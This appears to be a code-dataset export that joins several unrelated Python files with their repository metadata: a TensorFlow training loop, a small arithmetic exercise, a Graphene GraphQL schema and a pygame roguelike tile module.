freezen_list = TRAIN_PARAMETERS.get('freezen_list', None)
# --- training op, summaries, saver and session ---
train_op, summary_op, grads = tf_utils.create_train_op(loss_list[total_loss_index], opt, FLAGS.moving_average_decay, global_step, ema_var_list, freezen_list)
summary_writer = tf.summary.FileWriter(TRAIN_PARAMETERS['logs_path'] + FLAGS.model_abstract, tf.get_default_graph())
init_op = tf.global_variables_initializer()
saver, variable_restore_op = tf_utils.create_save_op(RESTORE_PARAMETERS['restore'], TRAIN_PARAMETERS['pretrained_model_path'], TRAIN_PARAMETERS.get('pretrained_model_scope',"None")
, TRAIN_PARAMETERS['max_to_keep'], ema_var_list, TRAIN_PARAMETERS.get('checkpoint_exclude_scopes', None))
sess, restore_step = tf_utils.create_session(TRAIN_PARAMETERS['ckpt_path'], init_op, learning_rate, RESTORE_PARAMETERS['learning_rate']
, saver, RESTORE_PARAMETERS['restore'], RESTORE_PARAMETERS['reset_learning_rate']
, variable_restore_op, gpu_memory_fraction = FLAGS.memory_fraction)
# Group the tensors fetched on every step: losses, predictions, and the
# train/summary ops (see the Fetch helper above).
fetch = Fetch()
fetch.add(list(loss_list), "loss")
fetch.add([model_outputs[1]], "pred")
fetch.add([train_op, summary_op], "trainop")
max_epochs = TRAIN_PARAMETERS['max_epochs']
# When resuming, the epoch number is parsed out of the checkpoint file
# name (pattern '<name>_<epoch>.ckpt').
if RESTORE_PARAMETERS['restore']:
ckpt_path = tf.train.latest_checkpoint(TRAIN_PARAMETERS['ckpt_path'])
restore_epoch = int(ckpt_path.split('.')[-2].split('_')[-1])
else:
restore_epoch = 0
print_each_epoch = TRAIN_PARAMETERS['print_each_epoch']
decay_epoch = TRAIN_PARAMETERS['decay_epoch']
decay_learning_rate = TRAIN_PARAMETERS['learning_rate']
# decay_point indexes the NEXT learning-rate entry; fast-forward it past
# decay milestones that were already reached before the restore point.
decay_point = 1
for _ in decay_epoch:
if restore_epoch >= _:
decay_point += 1
save_epochs = TRAIN_PARAMETERS['save_epochs']
# The generator yields batches and (apparently) the sentinel 0 at each
# epoch boundary -- see the `train_data != 0` loops below; confirm in
# data_loader.load_train_dataset.
train_dataset = data_loader.load_train_dataset(max_epochs + warmup_epoch - restore_epoch, preload_train_dataset, ROOT_CFG, AUGMENT_PARAMETERS)
train_data = next(train_dataset)
# --- warmup epochs: train with a small LR, raising it linearly ---
for warm_up_step in range(warmup_epoch):
LR = sess.run(learning_rate)
print("---------warmup[{}/{} LR:{:.6f}]--------".format(warm_up_step+1, warmup_epoch, LR))
warmupBar = progress_bar.ProgressBar(50, train_data_size)
warmup_index = 0
while train_data != 0:
batch_num = len(train_data[1])
fetch_real_value = sess.run(fetch.fetchlist,
feed_dict={prepare_data[0]: train_data[0],
prepare_data[2]: train_data[1],
prepare_data[1]: True})
warmup_index += batch_num
warmupBar.print(warmup_index)
train_data = next(train_dataset)
# Skip past the epoch sentinel, then raise the LR by one warmup step.
train_data = next(train_dataset)
sess.run(tf.assign(learning_rate, LR + warmup_ratios))
# After warmup (fresh runs only) pin the LR to the schedule's start value.
if not RESTORE_PARAMETERS['restore']:
# lr_init = RESTORE_PARAMETERS['learning_rate']
sess.run(tf.assign(learning_rate, lr_init))
epochRecorder = EpochRecorder(print_loss_dict, summary_writer, restore_epoch, max_epochs)
start = time.time()
step = restore_step
# --- main training loop ---
for epoch in range(restore_epoch + 1, max_epochs + 1):
# train_err[0] counts correct predictions, train_err[1] counts samples.
train_err = np.zeros((2), dtype=np.int32)
mean_loss = np.zeros((len(print_loss_dict)), dtype=np.float32)
steps_per_epoch = 0
now_batch_nums = 0
epochRecorder.start_epoch()
LR = sess.run(learning_rate)
while train_data != 0:
batch_num = len(train_data[1])
fetch_real_value = sess.run(fetch.fetchlist,
feed_dict={prepare_data[0]: train_data[0],
prepare_data[2]: train_data[1],
prepare_data[1]: True})
# Accumulate accuracy and the reportable slice of the losses.
prediction = fetch.get(fetch_real_value, "pred")[0]
pred_label = np.argmax(prediction, axis=1)
train_err[0] += np.sum(pred_label == train_data[1])
train_err[1] += float(batch_num)
mean_loss = mean_loss + fetch.get(fetch_real_value, "loss")[print_loss_index[0]:print_loss_index[1]]
step = step + 1
steps_per_epoch = steps_per_epoch + 1
now_batch_nums += batch_num
summary_str = fetch.get(fetch_real_value, "trainop")[-1]
summary_writer.add_summary(summary_str, global_step=step)
# Periodic progress report with running error rate, losses and ETA.
if print_each_epoch is not None and steps_per_epoch % print_each_epoch == 0:
total_time = time.time() - start
avg_time_per_step = total_time / print_each_epoch
start = time.time()
print_loss_value = mean_loss / steps_per_epoch
print('Epoch[{}/{}] Data[{}/{}]'.format(epoch-1, max_epochs, now_batch_nums, train_data_size), end='')
# ap_dict, total_ap, info_dict, pr_dict = eval_map.calmAP()
# print(',map{:.2f}'.format(100 * total_ap), end='')
tmp_err = eval_tools.top_error(train_err)
print(',err:{:.2f}'.format(tmp_err), end='')
for name, value in zip(print_loss_dict, print_loss_value):
print(', {} {:.4f}'.format(name, value), end='')
rest_time = total_time * (train_data_size - now_batch_nums) / batch_num / print_each_epoch
print(', {:.2f} seconds, remain {:.2f} seconds, LR {:.6f}'.format(total_time, rest_time, LR))
train_data = next(train_dataset)
# record train condition
# ap_dict, total_ap, info_dict, pr_dict = eval_map.calmAP()
# epochRecorder.summary_epoch(mean_loss, 100 * total_ap, LR, epoch, step, steps_per_epoch, 'train')
epochRecorder.summary_epoch(mean_loss, train_err, LR, epoch, step, steps_per_epoch, 'train')
# Advance past the epoch sentinel before the next epoch starts.
train_data = next(train_dataset)
# Step the LR schedule when this epoch is a decay milestone.
if epoch in decay_epoch:
sess.run(tf.assign(learning_rate, decay_learning_rate[decay_point]))
decay_point = decay_point + 1
# Checkpoint policy: a negative first entry of save_epochs means "save
# every |value| epochs"; otherwise save only at the listed epochs.
if save_epochs[0] < 0:
save_epoch = -save_epochs[0]
if epoch % save_epoch == 0:
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_{:d}'.format(epoch) + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
else:
if epoch in save_epochs:
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_{:d}'.format(epoch) + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
# Always write a final "<name>_last" checkpoint before shutting down.
filename = (TRAIN_PARAMETERS['ckpt_name'] + '_last' + '.ckpt')
filename = os.path.join(TRAIN_PARAMETERS['ckpt_path'], filename)
saver.save(sess, filename)
print('Write model to: {:s}'.format(filename))
sess.close()
# Script entry point: tf.app.run() parses the FLAGS defined above and then
# invokes main().
if __name__ == '__main__':
tf.app.run()
# real_grad = fetch_real_value[0:len(grads)]
# while True:
# key = input("input:")
# if key == "exit":
# break
# else:
# g_var = []
# n_var = []
# p_var = []
# for i, name in enumerate(grad_name):
# if key in name:
# print(name)
# g_var.append(real_grad[i])
# n_var.append(name)
# p_var.append(grad_real[i])
# p_var = sess.run(p_var)
# while True:
# key = input("query:")
# if key == "q":
# break
# if key == "p":
# for i, v in enumerate(n_var):
# print(n_var[i])
# else:
# for i, name in enumerate(n_var):
# if key in name:
# print("{}".format(name))
# info(g_var[i])
# info(p_var[i])
# real_var = sess.run(p_var)
# exit() | [
"784980667@qq.com"
] | 784980667@qq.com |
7c65675d6822a7edaf6bb50bacade930252936a7 | 6e3b8a04a074c30cf4fc43abe7a208f772df795b | /Data Types and Variables - Exercise/Task1.py | c017814f490a499fbf7b164e9cedce6713f5cc9e | [] | no_license | majurski/Softuni_Fundamentals | dc0808fdaab942896eebfb208fb6b291df797752 | bf53a9efdcb45eb911624ab86d762a6281391fb8 | refs/heads/master | 2022-11-29T06:06:06.287984 | 2020-08-10T19:36:18 | 2020-08-10T19:36:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | a = int(input())
b = int(input())
c = int(input())
d = int(input())
# Renamed 'sum' -> 'total': the original name shadowed the builtin sum().
# 'a' is read from stdin on the script's first line, just above this block.
total = a + b
division = int(total / c)
ends = division * d
print(ends) | [
"noreply@github.com"
] | majurski.noreply@github.com |
67f23f3e642558e2d11c4b9f83270551732d5387 | 075d4fdc9a10121e93ab33c1c3bafda88c4bf337 | /buho/buho/schema.py | 8dae84588adb898841bdc7759271cf33808f1f00 | [] | no_license | Tibiritabara/buho-backend | e8cdf4808a92eb65f53cbeabdeea14b2d811d038 | 841c7329bc4f0e5e1752b49afa11f12d1c83403b | refs/heads/master | 2023-08-05T10:59:59.416720 | 2020-06-24T23:02:30 | 2020-06-24T23:02:30 | 274,785,012 | 0 | 0 | null | 2021-09-22T19:30:07 | 2020-06-24T22:55:02 | Python | UTF-8 | Python | false | false | 335 | py | """
Graphene schema definition
"""
import graphene
import compras.mutations
import compras.queries
class Query(compras.queries.Query, graphene.ObjectType):
    """Root GraphQL query type, aggregating the compras queries."""
class Mutation(compras.mutations.Mutation, graphene.ObjectType):
    """Root GraphQL mutation type, aggregating the compras mutations."""
# Application-wide Graphene schema; built from the Query/Mutation roots above.
schema = graphene.Schema(
query=Query,
mutation=Mutation,
)
| [
"santos.ricardo@bcgplatinion.com"
] | santos.ricardo@bcgplatinion.com |
e67f7e37e6cce0a557a8d702c6bab8d31037acd8 | 5b764b91be0016ee703fca41927b1438487e797b | /pygamerogue/tile.py | eda25d37c3805ae806fde03cb4b3db35b0634853 | [
"BSD-3-Clause"
] | permissive | mikolasan/pyroguelike | b33b7a959144b9b115ae4876da0d620b33a28eb3 | d51b01a566b5edb39792b59d683b4bf827399ba4 | refs/heads/master | 2021-07-23T23:06:28.822059 | 2021-01-11T16:57:58 | 2021-01-11T16:57:58 | 179,420,626 | 0 | 1 | BSD-3-Clause | 2021-07-07T15:32:36 | 2019-04-04T04:20:26 | Python | UTF-8 | Python | false | false | 3,755 | py | import pygame
# Edge length of one map cell, in pixels: (width, height).
rogue_size = (48, 48)


def map_to_pixel(x, y):
    """Convert a grid coordinate (x, y) into the pixel position of its cell."""
    tile_w, tile_h = rogue_size
    return x * tile_w, y * tile_h
class Tile:
    """A coloured, glyph-bearing square rendered on the rogue map.

    A tile tracks two coordinate systems: ``map_pos`` (grid cells) and
    ``pos``/``rect`` (pixels).  Exactly one of *map_pos* / *pos* should be
    supplied to the constructor; the other is derived from it.
    """

    def __init__(self, size, map_pos, pos, background_color, border_color, symbol, padding, text_color):
        self.size = size
        self.pos = {}
        # Prefer the grid coordinate when supplied; otherwise derive the
        # grid cell from the pixel position.
        if map_pos is not None:
            self.update_map_position(map_pos)
        else:
            self.set_rect_position(pos)
        self.background_color = background_color
        self.border_color = border_color
        self.symbol = symbol
        self.text_padding = padding
        self.text_color = text_color
        self.angle = 0
        self.make_image()

    def set_rect_position(self, position):
        """Place the tile at pixel *position* and derive its grid cell."""
        px, py = position
        self.pos['x'] = px
        self.pos['y'] = py
        self.map_pos = (px // rogue_size[0], py // rogue_size[1])
        self.update_rect_position()

    def update_map_position(self, map_pos):
        """Move the tile to grid cell *map_pos*; the pixel position follows."""
        self.map_pos = map_pos
        self.pos['x'], self.pos['y'] = map_to_pixel(map_pos[0], map_pos[1])

    def update_rect_position(self):
        """Sync the blit rect with the pixel position (once the rect exists)."""
        if hasattr(self, 'rect'):
            self.rect.left, self.rect.top = self.pos['x'], self.pos['y']

    def make_image(self):
        """Render the glyph onto a fresh surface and (re)create the rect."""
        self.font = pygame.font.Font('font.ttf', 40)
        self.rendered_symbol = self.font.render(self.symbol, True, self.text_color)
        self.original_image = pygame.Surface(self.size)
        self.original_image.fill(self.background_color)
        self.original_image.blit(self.rendered_symbol, self.text_padding)
        self.image = self.original_image
        self.rect = self.image.get_rect()
        self.update_rect_position()

    def update(self, events):
        """Per-frame update hook; *events* is currently unused."""
        self.update_rect_position()

    def draw(self, screen, camera):
        """Blit the tile onto *screen* through the camera transform."""
        screen.blit(self.image, camera.applyrect(self.rect))
# Base preset shared by every wall tile; individual wall entries below
# override only the glyph ('symbol').  Colours are RGB tuples; 'padding'
# is the blit offset of the rendered glyph inside the tile surface.
wall = {
'background': (44, 61, 81),
'border': (0, 0, 0),
'text': (146, 154, 162),
'symbol': '-',
'padding': [0, 0],
}
# Preset table mapping a map-character to the colours/glyph used by
# RogueTile below.  Keys mirror the characters of the ASCII level map.
TileDB = {
'-': {
**wall,
'symbol': '-',
},
'|': {
**wall,
'symbol': '|',
},
'<': {
**wall,
'symbol': '<',
},
# floor
'.': {
'background': (113, 118, 138),
'border': (0, 0, 0),
'text': (226, 199, 192),
'symbol': '.',
'padding': [0, 0],
},
# player
'@': {
'background': (44, 44, 44),
'border': (50, 100, 0),
'text': (91, 198, 208),
'symbol': '@',
'padding': [0, 0],
},
'!': {
'background': (208, 221, 240),
'border': (250, 0, 0),
'text': (110, 25, 32),
'symbol': '!',
'padding': [0, 0],
},
# NOTE(review): the '/' preset renders the glyph 'a', not '/'; looks
# deliberate but worth confirming against the level art.
'/': {
'background': (92, 102, 15),
'border': (250, 0, 0),
'text': (249, 199, 52),
'symbol': 'a',
'padding': [0, 0],
},
'+': {
'background': (146, 154, 162),
'border': (250, 100, 0),
'text': (44, 61, 81),
'symbol': '+',
'padding': [0, 0],
},
'$': {
'background': (224, 219, 225),
'border': (0, 200, 0),
'text': (96, 106, 53),
'symbol': '$',
'padding': [0, 0],
},
# enemy
'e': {
'background': (254, 160, 47),
'border': (250, 0, 0),
'text': (222, 102, 0),
'symbol': 'e',
'padding': [0, 0],
},
}
class RogueTile(Tile):
    """A Tile whose colours and glyph come from the TileDB preset table."""

    def __init__(self, map_pos, tile_id):
        # Look up the visual preset for this map character.
        spec = TileDB[tile_id]
        super().__init__(
            size=rogue_size,
            map_pos=map_pos,
            pos=None,
            background_color=spec['background'],
            border_color=spec['border'],
            symbol=spec['symbol'],
            padding=spec['padding'],
            text_color=spec['text'])
| [
"neupokoev.n@gmail.com"
] | neupokoev.n@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.